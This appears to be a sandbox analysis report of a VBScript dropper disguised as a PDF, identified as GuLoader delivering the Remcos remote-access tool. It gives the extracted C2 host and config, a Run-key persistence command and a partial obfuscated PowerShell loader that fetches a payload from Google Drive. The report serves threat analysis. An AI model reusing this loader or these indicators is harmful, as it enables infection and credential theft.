Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-09-2024 08:30
Static task
static1
Behavioral task
behavioral1
Sample
VDF645425140·pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
VDF645425140·pdf.vbs
Resource
win10v2004-20240802-en
General
-
Target
VDF645425140·pdf.vbs
-
Size
25KB
-
MD5
f758726ca8e3639be7fb0ff04a7a8c4a
-
SHA1
14d882ba6389b41a57f012c409080d7d1e872ac7
-
SHA256
049feb6dcf68c869a98bf8fe7fe64434e8e27c18954a290094d636ac0bb2be23
-
SHA512
23961d2ad2057c002c69cb78a801f0b044752acd8cbbe9905aca11ef9ccea1149a8c211c893d71917589ad9d5e1ba2853df59a97b3824cafbcdee1060947124e
-
SSDEEP
384:iinVweRHN57gFx1JMhH1HxE2OUZrBclg0tMlDNtjwsLwi+eRrs+hNXusOKSqILB7:iiYgKXpDcqQo
Malware Config
Extracted
remcos
RemoteHost
a458386d9.duckdns.org:3256
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-U25QJ2
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2292-96-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1520-95-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/2080-92-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2080-92-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/1520-95-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 2 IoCs
flow pid Process 17 4688 powershell.exe 19 4688 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tebbet = "%Nymarxister% -w 1 $Nonoxidation=(Get-ItemProperty -Path 'HKCU:\\Macerative\\').Semiquantitatively;%Nymarxister% ($Nonoxidation)" reg.exe -
pid Process 4688 powershell.exe 4392 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 16 drive.google.com 17 drive.google.com 35 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 3416 wab.exe 3416 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4392 powershell.exe 3416 wab.exe -
Suspicious use of SetThreadContext 60 IoCs
description pid Process procid_target PID 4392 set thread context of 3416 4392 powershell.exe 98 PID 3416 set thread context of 4736 3416 wab.exe 103 PID 3416 set thread context of 4764 3416 wab.exe 104 PID 3416 set thread context of 4016 3416 wab.exe 106 PID 3416 set thread context of 3716 3416 wab.exe 108 PID 3416 set thread context of 656 3416 wab.exe 109 PID 3416 set thread context of 2512 3416 wab.exe 110 PID 3416 set thread context of 4080 3416 wab.exe 111 PID 3416 set thread context of 2484 3416 wab.exe 112 PID 3416 set thread context of 1520 3416 wab.exe 113 PID 3416 set thread context of 2080 3416 wab.exe 114 PID 3416 set thread context of 2292 3416 wab.exe 115 PID 3416 set thread context of 1200 3416 wab.exe 116 PID 3416 set thread context of 3332 3416 wab.exe 117 PID 3416 set thread context of 2168 3416 wab.exe 118 PID 3416 set thread context of 2916 3416 wab.exe 119 PID 3416 set thread context of 760 3416 wab.exe 120 PID 3416 set thread context of 3080 3416 wab.exe 121 PID 3416 set thread context of 5048 3416 wab.exe 122 PID 3416 set thread context of 1940 3416 wab.exe 123 PID 3416 set thread context of 116 3416 wab.exe 124 PID 3416 set thread context of 4688 3416 wab.exe 125 PID 3416 set thread context of 2076 3416 wab.exe 126 PID 3416 set thread context of 4700 3416 wab.exe 127 PID 3416 set thread context of 5040 3416 wab.exe 128 PID 3416 set thread context of 1152 3416 wab.exe 129 PID 3416 set thread context of 4880 3416 wab.exe 130 PID 3416 set thread context of 3652 3416 wab.exe 131 PID 3416 set thread context of 432 3416 wab.exe 132 PID 3416 set thread context of 2052 3416 wab.exe 133 PID 3416 set thread context of 3888 3416 wab.exe 134 PID 3416 set thread context of 1912 3416 wab.exe 135 PID 3416 set thread context of 3576 3416 wab.exe 136 PID 3416 set thread context of 716 3416 wab.exe 137 PID 3416 set thread context of 4592 3416 wab.exe 138 PID 3416 set thread context of 5100 3416 wab.exe 139 PID 3416 set thread context of 2128 3416 wab.exe 140 PID 3416 set thread context of 3288 3416 wab.exe 141 PID 3416 set thread context of 4800 3416 wab.exe 142 PID 3416 set thread context of 3088 3416 wab.exe 143 PID 3416 set thread context of 1596 3416 wab.exe 144 PID 3416 set thread context of 212 3416 wab.exe 145 PID 3416 set thread context of 1888 3416 wab.exe 146 PID 3416 set thread context of 4704 3416 wab.exe 147 PID 3416 set thread context of 4328 3416 wab.exe 148 PID 3416 set thread context of 924 3416 wab.exe 149 PID 3416 set thread context of 3020 3416 wab.exe 150 PID 3416 set thread context of 2792 3416 wab.exe 151 PID 3416 set thread context of 1176 3416 wab.exe 152 PID 3416 set thread context of 1472 3416 wab.exe 153 PID 3416 set thread context of 512 3416 wab.exe 154 PID 3416 set thread context of 4916 3416 wab.exe 155 PID 3416 set thread context of 940 3416 wab.exe 156 PID 3416 set thread context of 2528 3416 wab.exe 157 PID 3416 set thread context of 4236 3416 wab.exe 158 PID 3416 set thread context of 3340 3416 wab.exe 159 PID 3416 set thread context of 5000 3416 wab.exe 160 PID 3416 set thread context of 4892 3416 wab.exe 161 PID 3416 set thread context of 1328 3416 wab.exe 162 PID 3416 set thread context of 1816 3416 wab.exe 163 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe -
Modifies registry class 56 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings svchost.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5100 reg.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4688 powershell.exe 4688 powershell.exe 4392 powershell.exe 4392 powershell.exe 4392 powershell.exe 2292 wab.exe 2292 wab.exe 1520 wab.exe 1520 wab.exe 1520 wab.exe 1520 wab.exe -
Suspicious behavior: MapViewOfSection 60 IoCs
pid Process 4392 powershell.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe 3416 wab.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4688 powershell.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 2292 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3416 wab.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2436 wrote to memory of 4688 2436 WScript.exe 86 PID 2436 wrote to memory of 4688 2436 WScript.exe 86 PID 4688 wrote to memory of 3716 4688 powershell.exe 88 PID 4688 wrote to memory of 3716 4688 powershell.exe 88 PID 4688 wrote to memory of 4392 4688 powershell.exe 96 PID 4688 wrote to memory of 4392 4688 powershell.exe 96 PID 4688 wrote to memory of 4392 4688 powershell.exe 96 PID 4392 wrote to memory of 2980 4392 powershell.exe 97 PID 4392 wrote to memory of 2980 4392 powershell.exe 97 PID 4392 wrote to memory of 2980 4392 powershell.exe 97 PID 4392 wrote to memory of 3416 4392 powershell.exe 98 PID 4392 wrote to memory of 3416 4392 powershell.exe 98 PID 4392 wrote to memory of 3416 4392 powershell.exe 98 PID 4392 wrote to memory of 3416 4392 powershell.exe 98 PID 4392 wrote to memory of 3416 4392 powershell.exe 98 PID 3416 wrote to memory of 1780 3416 wab.exe 100 PID 3416 wrote to memory of 1780 3416 wab.exe 100 PID 3416 wrote to memory of 1780 3416 wab.exe 100 PID 1780 wrote to memory of 5100 1780 cmd.exe 102 PID 1780 wrote to memory of 5100 1780 cmd.exe 102 PID 1780 wrote to memory of 5100 1780 cmd.exe 102 PID 3416 wrote to memory of 4736 3416 wab.exe 103 PID 3416 wrote to memory of 4736 3416 wab.exe 103 PID 3416 wrote to memory of 4736 3416 wab.exe 103 PID 3416 wrote to memory of 4736 3416 wab.exe 103 PID 3416 wrote to memory of 4764 3416 wab.exe 104 PID 3416 wrote to memory of 4764 3416 wab.exe 104 PID 3416 wrote to memory of 4764 3416 wab.exe 104 PID 3416 wrote to memory of 4764 3416 wab.exe 104 PID 3416 wrote to memory of 4016 3416 wab.exe 106 PID 3416 wrote to memory of 4016 3416 wab.exe 106 PID 3416 wrote to memory of 4016 3416 wab.exe 106 PID 3416 wrote to memory of 4016 3416 wab.exe 106 PID 3416 wrote to memory of 3716 3416 wab.exe 108 PID 3416 wrote to memory of 3716 3416 wab.exe 108 PID 3416 wrote to memory of 3716 3416 wab.exe 108 PID 3416 wrote to memory of 3716 3416 wab.exe 108 PID 3416 wrote to memory of 656 3416 wab.exe 109 PID 3416 wrote to memory of 656 3416 wab.exe 109 PID 3416 wrote to memory of 656 3416 wab.exe 109 PID 3416 wrote to memory of 656 3416 wab.exe 109 PID 3416 wrote to memory of 2512 3416 wab.exe 110 PID 3416 wrote to memory of 2512 3416 wab.exe 110 PID 3416 wrote to memory of 2512 3416 wab.exe 110 PID 3416 wrote to memory of 2512 3416 wab.exe 110 PID 3416 wrote to memory of 4080 3416 wab.exe 111 PID 3416 wrote to memory of 4080 3416 wab.exe 111 PID 3416 wrote to memory of 4080 3416 wab.exe 111 PID 3416 wrote to memory of 4080 3416 wab.exe 111 PID 3416 wrote to memory of 2484 3416 wab.exe 112 PID 3416 wrote to memory of 2484 3416 wab.exe 112 PID 3416 wrote to memory of 2484 3416 wab.exe 112 PID 3416 wrote to memory of 2484 3416 wab.exe 112 PID 3416 wrote to memory of 1520 3416 wab.exe 113 PID 3416 wrote to memory of 1520 3416 wab.exe 113 PID 3416 wrote to memory of 1520 3416 wab.exe 113 PID 3416 wrote to memory of 1520 3416 wab.exe 113 PID 3416 wrote to memory of 2080 3416 wab.exe 114 PID 3416 wrote to memory of 2080 3416 wab.exe 114 PID 3416 wrote to memory of 2080 3416 wab.exe 114 PID 3416 wrote to memory of 2080 3416 wab.exe 114 PID 3416 wrote to memory of 2292 3416 wab.exe 115 PID 3416 wrote to memory of 2292 3416 wab.exe 115 PID 3416 wrote to memory of 2292 3416 wab.exe 115
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\VDF645425140·pdf.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.Name) {$Fluoboride++;$Frothier+='subst';$Frothier+='r';}$Frothier+='ing';Function Incrassation($Tombing){$Comebacker=$Tombing.Length-$Fluoboride;For( $Unavailably=5;$Unavailably -lt $Comebacker;$Unavailably+=6){$Vertebrally+=$Tombing.$Frothier.'Invoke'( $Unavailably, $Fluoboride);}$Vertebrally;}function snedriver($Kurveoplsning){ & ($Fatsia) ($Kurveoplsning);}$Precipitantness=Incrassation ' NonrMSlurkoN nsezMaaleiSkandlAbsollD,horaBygge/Numme5Gage..,oged0Limni Ergo(Tsar.W maaiMinkan Non.dHideroVoyagwBismusUsher TilbaNSpg.lTTorni omp1Trans0Knuse.We.he0Poxal;An,st SpeedWT naciTilfinSlank6Bart.4T.ela;A.tid SubcexS nds6.eate4Trape; Tocc Over rChondvAmido:Proli1,uamf2 ,dda1Der i.Ea tl0Togst)Tilbu TartuG,erleeSkip,cForhjkHandeoEyesh/Semin2Creos0Skitt1Benzi0Inter0Agurk1 kaot0Bronc1Tegne LopseFPrecoiT.xinr Tey eLissif ClavoButl.xDrjde/Disin1Rust 2Pl.sm1Indhe.Kunds0 So i ';$Unavailablyndgivende=Incrassation ',striUKortksAn,lceOtiorrSvi.g- .nsvA.rerrgRefere P,renYperntSfyrb ';$Capriccioso233=Incrassation 'Afdanh PrimtAlairtMidmopSup rsPakis:,nqui/Pric./T ansdagnatrFo.ldi.olyfvFredheFilms.AutoogNo.bio P,ero Pre gGendalDuodeePersi.RevelcTrivsoYak,mm,emue/B uebuPacebcmanch?NrigsebarkexToftep UdjvoNoninrS,ffet .ent= Svand ApanoBesk,wLgnhantrs,nl DialoPyroaaTerridcombc&CentriTr midRe.rn=For a1Tvelye No,ibDiffe6.ridt-.rbli2PrimeDKretexPropei R.siA,ndviPArsen3 FibeZFasan9BisttMSa,amPSyns,P Skjoj R,ssMFadlsEOutdo7FastsiCocklO Glau4 DimeHPhysi4Une,tV BogmI.kannZProtilEfte UKursnf StosZb.lab ';$Transportfly=Incrassation 'overf>Reson ';$Fatsia=Incrassation 'Brnefi bet,e BiotxFresk ';$Ceiler='Licensaftale';$Virgulate = Incrassation ' tileTragtcNymphhRela,oMegap mulig%Albu,aAffinp innpDefskd Knita SalotTunkeaCompl%Aphot\AskorDM.lhiaCgi.gl helimWeldiaKlatrtFlammi.navnn T.lleCytodr .pernQuadreFremlsTomm .AssemS ForneAkkumlPolit lssen&Goodl&Divor dranke austcBrndehBurnsoAntit walbotHydro ';snedriver (Incrassation 'Kortg$ ConcgVrtsllSquibotnd nb SupeaPrev.lKonfe:Clo,eSEde.tuByttekDrankk InseeUlyk r UnqulPristaSledeg NeutePerpe= Berg( S.rec Alumm Pr,od cht Afsn/ Lipocfebri skibi$catalVSabini Troor Pan.gBrne,uMisealKollaa SwiltstalleSpeed) Ford ');snedriver (Incrassation 'Blegn$Chromg MilllNona oForvrbniddiaFl ppl Himm: BallFUnv tiKvadrs DulskAnetheGastrr.langiSendrsOp reaSemitmSymmelMystii SagsnBrun gUkamp=appel$Co,liCPad yaB.lanpOleocr Brooiwa soc pewycImboliPan.ioLifegsFritioEpig.2Dekag3,rfle3Forsk.GenfosHauntpD udglLangsiUrhantFordy(Slove$XenopTFasterDublea Sf,rnhandesPre.np Gym,oImiterP,rtutStyrefNonaflfiskeyIndda)Ama,r ');snedriver (Incrassation 'We,sm[AlyssNPed sepelomtErico.ObdorSOmstteFlan rAs.lrvBekeniMicrocGenneeSalvoP veroSmrokiBolo.n resttSinupMNavigaUneasnGangea ritig chopeNymferKita ] lit:Sprog:StoejSNonaneProjecStveku Ma rrC.aimiSwisstOmgreySne.rPCommarUdgruoTurm.tForhaoDw.rfc usinoIndsklPanes Baads=gyrop Bacil[IconoNKu.ineClacktYeast.ha.vtSEmusieDisu c FirkuAlminrHaandiVal ltAftegyBestsPV.elsrDwarfoHomoctPneumo PhotcDwaynoP,ojelBe,alTLampay,nudgp Photeflles],elic:Leann:Pr.klTHarcel KanjsRampi1Aarsk2Vinfl ');$Capriccioso233=$Fiskerisamling[0];$Rensdyrmossernes= (Incrassation 'Scutt$ Muddg,evgel,eltioS dsebfod,uaTheonlBukle: kreOUnd.fvKautieSkelerSemichS.urreDmperaDkketd Bouii CastnUsunde HedesHeli s Reko=HovedN Omste BoskwSynke- Trs.O D.spb UndejRaasteOldefc proutForf, forsnS JouryFluidsTilstt U tre,hevemBlods.lun rNR inteHypaltNatur.AverrWStanse SkanbJu,tiCAandel FumaiOpf.eeOliernStemmt');$Rensdyrmossernes+=$Sukkerlage[1];snedriver ($Rensdyrmossernes);snedriver (Incrassation 'Frban$Bil eO virkvTry beOpfanr til.hDecimeUdeeraDensadFibbei,odernMa.theDecumsKomm shexad.P rtiHsociaeBrutta 